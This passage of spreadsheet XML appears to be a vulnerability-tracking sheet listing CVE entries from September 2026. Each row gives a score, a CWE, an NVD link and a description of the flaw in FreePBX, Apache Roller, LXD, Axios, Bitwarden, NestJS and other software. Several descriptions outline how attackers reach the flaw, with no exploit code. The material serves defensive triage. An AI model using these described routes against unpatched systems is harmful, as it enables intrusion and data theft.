        <v>7.7</v>
      </c>
      <c r="E93" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F93" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G93" s="5" t="inlineStr"/>
      <c r="H93" s="5" t="inlineStr"/>
      <c r="I93" s="5" t="inlineStr"/>
      <c r="J93" s="5" t="inlineStr"/>
      <c r="K93" s="5" t="inlineStr"/>
      <c r="L93" s="5" t="inlineStr"/>
      <c r="M93" s="5" t="inlineStr"/>
      <c r="N93" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O93" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P93" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q93" s="5" t="inlineStr"/>
      <c r="R93" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S93" s="5" t="inlineStr">
        <is>
          <t>FreePBX is an open source IP PBX. Prior to versions 16.0.4 and 17.0.6, the FreePBX Music on Hold (MoH) module contains a critical security flaw that allows authenticated attackers to execute arbitrary system commands with the privileges of the Asterisk service. Authentication with an existing FreePBX administrator account is required. The root cause lies in the fact that the module accepts a POST parameter that defines a custom Asterisk application, which is then stored in the database without any sanitization. Later, this data is written directly to the musiconhold_additional.conf configuration file without validation. Since Asterisk reads this configuration file and executes the specified application, an attacker can inject arbitrary commands that will be executed with Asterisk's permissions. This issue has been patched in versions 16.0.4 and 17.0.6.</t>
        </is>
      </c>
      <c r="T93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45562</t>
        </is>
      </c>
    </row>
    <row r="94">
      <c r="A94" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B94" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C94" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82348</t>
        </is>
      </c>
      <c r="D94" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E94" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F94" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G94" s="5" t="inlineStr"/>
      <c r="H94" s="5" t="inlineStr"/>
      <c r="I94" s="5" t="inlineStr"/>
      <c r="J94" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K94" s="5" t="inlineStr"/>
      <c r="L94" s="5" t="inlineStr"/>
      <c r="M94" s="5" t="inlineStr"/>
      <c r="N94" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O94" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P94" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q94" s="5" t="inlineStr"/>
      <c r="R94" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S94" s="5" t="inlineStr">
        <is>
          <t>Authorization Bypass Through User-Controlled Key in Apache Roller 6.1.5 allows an authenticated user with authoring rights on one weblog to read, modify, or delete resources belonging to another weblog through unscoped identifier-based lookups. This affects multi-user installations where users are intended to be isolated between weblogs; no optional feature or non-default configuration is required. A user with administrator rights on their weblog can also overwrite another weblog's Velocity template, whose content is evaluated when the victim weblog renders. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which scopes authoring resource lookups to the acting weblog.</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82348</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82376</t>
        </is>
      </c>
      <c r="D95" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr"/>
      <c r="M95" s="5" t="inlineStr"/>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P95" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>Improper Restriction of XML External Entity Reference in Apache Roller 6.1.5 allows a user with entry-editing rights on a weblog to cause the server to parse an attacker-influenced trackback response with an XML parser that does not disable external entity resolution, leading to disclosure of files readable by the Roller process. The Trackback control is hidden in the standard UI, but its action remains directly reachable, and no non-default server configuration is required. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which removes the outbound trackback response parser.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82376</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82379</t>
        </is>
      </c>
      <c r="D96" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr"/>
      <c r="M96" s="5" t="inlineStr"/>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P96" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>Authentication Bypass by Capture-replay in Apache Roller 6.1.5 allows an attacker who captures a valid WSSE digest authentication header to replay it and gain the victim's AtomPub authority, because the authentication does not enforce nonce uniqueness or timestamp freshness. Only installations that enable the non-default AtomPub API with WSSE authentication and plaintext-compatible password storage are affected. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which removes WSSE as an AtomPub authentication method; existing installations configured for WSSE fail closed until an administrator explicitly selects a supported authentication method.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82379</t>
        </is>
      </c>
    </row>
    <row r="97">
      <c r="A97" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B97" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C97" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82386</t>
        </is>
      </c>
      <c r="D97" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E97" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F97" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G97" s="5" t="inlineStr"/>
      <c r="H97" s="5" t="inlineStr"/>
      <c r="I97" s="5" t="inlineStr"/>
      <c r="J97" s="5" t="inlineStr"/>
      <c r="K97" s="5" t="inlineStr"/>
      <c r="L97" s="5" t="inlineStr"/>
      <c r="M97" s="5" t="inlineStr"/>
      <c r="N97" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O97" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P97" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q97" s="5" t="inlineStr"/>
      <c r="R97" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="S97" s="5" t="inlineStr">
        <is>
          <t>Improper Restriction of XML External Entity Reference in Apache Roller 6.1.5 allows a weblog administrator to read files readable by the Roller process and reach internal network addresses by importing a crafted OPML document, because the bookmark import parser does not disable external entity resolution. No non-default configuration is required; the import is reached through the administrator bookmark-import action. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which uses a hardened parser that disables external entities and document type declarations.</t>
        </is>
      </c>
      <c r="T97" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82386</t>
        </is>
      </c>
    </row>
    <row r="98">
      <c r="A98" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B98" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C98" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82928</t>
        </is>
      </c>
      <c r="D98" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E98" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F98" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G98" s="5" t="inlineStr"/>
      <c r="H98" s="5" t="inlineStr"/>
      <c r="I98" s="5" t="inlineStr"/>
      <c r="J98" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K98" s="5" t="inlineStr"/>
      <c r="L98" s="5" t="inlineStr"/>
      <c r="M98" s="5" t="inlineStr"/>
      <c r="N98" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O98" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P98" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q98" s="5" t="inlineStr"/>
      <c r="R98" s="5" t="inlineStr">
        <is>
          <t>CWE-1242</t>
        </is>
      </c>
      <c r="S98" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module contains a hardcoded SSH public key in /root/.ssh/authorized_keys, serving as a potential backdoor. The SSH daemon allows root login via key authentication and starts automatically. An attacker with the matching private key can gain a root shell on any affected device, resulting in full system compromise. The key cannot be removed without remounting the file system and survives a factory reset. Vendor notes that this functionality was used only for service purposes.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T98" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82928</t>
        </is>
      </c>
    </row>
    <row r="99">
      <c r="A99" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B99" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C99" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97335</t>
        </is>
      </c>
      <c r="D99" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E99" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F99" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G99" s="5" t="inlineStr"/>
      <c r="H99" s="5" t="inlineStr"/>
      <c r="I99" s="5" t="inlineStr"/>
      <c r="J99" s="5" t="inlineStr"/>
      <c r="K99" s="5" t="inlineStr"/>
      <c r="L99" s="5" t="inlineStr"/>
      <c r="M99" s="5" t="inlineStr"/>
      <c r="N99" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O99" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P99" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q99" s="5" t="inlineStr"/>
      <c r="R99" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S99" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in the custom storage volume creation endpoint in Canonical LXD versions 5.0.0 and later (fixed in 5.0.10, 5.21.8 and 6.10) on Linux allows an authenticated client with permission to create custom volumes in a project to copy, and so read, any custom storage volume from any other project on the server, including its snapshots and configuration. The client does this with a crafted request that sets a source volume and source.project but omits source.type.</t>
        </is>
      </c>
      <c r="T99" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97335</t>
        </is>
      </c>
    </row>
    <row r="100">
      <c r="A100" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B100" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101905</t>
        </is>
      </c>
      <c r="D100" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E100" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F100" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G100" s="5" t="inlineStr"/>
      <c r="H100" s="5" t="inlineStr"/>
      <c r="I100" s="5" t="inlineStr"/>
      <c r="J100" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K100" s="5" t="inlineStr"/>
      <c r="L100" s="5" t="inlineStr"/>
      <c r="M100" s="5" t="inlineStr"/>
      <c r="N100" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O100" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P100" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q100" s="5" t="inlineStr"/>
      <c r="R100" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-441</t>
        </is>
      </c>
      <c r="S100" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.15.2 until 1.20.0, the Node HTTP adapter in lib/adapters/http.js supplies request options without an own createConnection value. A separate same-process prototype-pollution flaw places a function on Object.prototype.createConnection. Node resolves and invokes the inherited createConnection socket factory, allowing the attacker-controlled function to select the transport endpoint. The attacker endpoint can receive request headers and bodies, including credentials, and return attacker-controlled responses while the URL appears legitimate. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101905</t>
        </is>
      </c>
    </row>
    <row r="101">
      <c r="A101" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B101" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55160</t>
        </is>
      </c>
      <c r="D101" s="5" t="n">
        <v>7.6</v>
      </c>
      <c r="E101" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F101" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G101" s="5" t="inlineStr"/>
      <c r="H101" s="5" t="inlineStr"/>
      <c r="I101" s="5" t="inlineStr"/>
      <c r="J101" s="5" t="inlineStr">
        <is>
          <t>aws, requests</t>
        </is>
      </c>
      <c r="K101" s="5" t="inlineStr"/>
      <c r="L101" s="5" t="inlineStr"/>
      <c r="M101" s="5" t="inlineStr"/>
      <c r="N101" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O101" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P101" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q101" s="5" t="inlineStr"/>
      <c r="R101" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S101" s="5" t="inlineStr">
        <is>
          <t>Stringer is a self-hosted, anti-social RSS reader. Prior to commit 75cb095, an unrestricted Server-Side Request Forgery (SSRF) vulnerability allows any authenticated user to force the Stringer server to send arbitrary HTTP/HTTPS requests to internal networks, localhost services, and cloud metadata endpoints (e.g. AWS IMDS 169.254.169.254). When self-service signup is enabled (Setting::UserSignup), even a low-privileged registered user can exploit this to scan internal services or steal cloud IAM credentials. This issue has been patched via commit 75cb095.</t>
        </is>
      </c>
      <c r="T101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55160</t>
        </is>
      </c>
    </row>
    <row r="102">
      <c r="A102" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B102" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100751</t>
        </is>
      </c>
      <c r="D102" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E102" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F102" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G102" s="5" t="inlineStr"/>
      <c r="H102" s="5" t="inlineStr"/>
      <c r="I102" s="5" t="inlineStr"/>
      <c r="J102" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K102" s="5" t="inlineStr"/>
      <c r="L102" s="5" t="inlineStr"/>
      <c r="M102" s="5" t="inlineStr"/>
      <c r="N102" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O102" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P102" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q102" s="5" t="inlineStr"/>
      <c r="R102" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S102" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Privileged stored XSS via data-rlta-url attributes in Tabs &amp; Accordions (Pro) 2.3.0 - 3.1.0 - Tabs &amp; Accordions Pro accepts a url option for an item and writes it to a generated data-rlta-url attribute. The browser code passes that value to window.open() when the item is activated. Affected versions do not reject browser URL schemes which execute JavaScript. Joomla sees ordinary plugin syntax while filtering the authored article; Tabs &amp; Accordions creates the executable browser behavior later while rendering the article.</t>
        </is>
      </c>
      <c r="T102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100751</t>
        </is>
      </c>
    </row>
    <row r="103">
      <c r="A103" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B103" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101878</t>
        </is>
      </c>
      <c r="D103" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E103" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G103" s="5" t="inlineStr"/>
      <c r="H103" s="5" t="inlineStr"/>
      <c r="I103" s="5" t="inlineStr"/>
      <c r="J103" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K103" s="5" t="inlineStr"/>
      <c r="L103" s="5" t="inlineStr"/>
      <c r="M103" s="5" t="inlineStr"/>
      <c r="N103" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O103" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P103" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q103" s="5" t="inlineStr"/>
      <c r="R103" s="5" t="inlineStr">
        <is>
          <t>CWE-303</t>
        </is>
      </c>
      <c r="S103" s="5" t="inlineStr">
        <is>
          <t>Bitwarden Server 2025.6.0 before 2026.5.0 declares the @ExternalId parameter of the User_ReadBySsoUserOrganizationIdExternalId stored procedure as NVARCHAR(50) while the column it queries stores NVARCHAR(300), silently truncating the SSO login identifier on SQL Server deployments and allowing a user whose identity-provider identifier begins with another organization member's full 50-character identifier to authenticate as that member and obtain a victim-scoped access token.</t>
        </is>
      </c>
      <c r="T103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101878</t>
        </is>
      </c>
    </row>
    <row r="104">
      <c r="A104" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102276</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.19, 2.1.5, 3.0.7, and 5.0.10, crafted brace patterns can exhaust the native stack in parseCommaParts because parseCommaParts recursively processes the remainder once per brace group and uses push.apply to pass every element of a very large comma-part array as a function argument. Patterns containing many comma-separated brace groups trigger the recursive path, while the large array triggers the argument-array path without deep recursion. These paths cause recursive and argument-array native stack exhaustion before max or maxLength can limit output, potentially terminating the Node.js process in a process-terminating denial of service. This issue is fixed in versions 1.1.19, 2.1.5, 3.0.7, and 5.0.10.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102276</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102278</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.20, 2.1.6, 3.0.8, and 5.0.11, deeply nested brace groups cause expand_() to recurse once per nesting level at comma-member and single-set expansion sites, exhausting the native stack before output limits can apply and potentially terminating the Node.js process. expand_ performs uncontrolled recursion for nested brace alternatives and single-part sets. deeply nested brace groups supplied as an untrusted pattern. expand_ is affected. expand is affected. Comma members is affected. Single set is affected. native stack exhaustion during nested sub-expansion. process-terminating denial of service. This issue is fixed in versions 1.1.20, 2.1.6, 3.0.8, and 5.0.11.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102278</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102281</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-674</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>Nest is a framework for building scalable Node.js server-side applications. Prior to 11.2.4 and 12.0.2, a single message with a deeply nested object in its pattern can terminate a NestJS microservice using the TCP or RabbitMQ transport. ServerTCP#handleMessage and ServerRMQ#handleMessage pass a client-controlled non-string pattern to JSON.stringify to derive the handler lookup key; sufficiently deep nesting throws RangeError: Maximum call stack size exceeded, and the unhandled promise rejection terminates Node.js under its default behavior. An attacker who can reach the TCP port or publish to the consumed RabbitMQ queue or exchange can crash the service on demand; other transports are not affected because their patterns arrive as strings. This issue is fixed in versions 11.2.4 and 12.0.2.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102281</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101916</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr">
        <is>
          <t>grpc</t>
        </is>
      </c>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
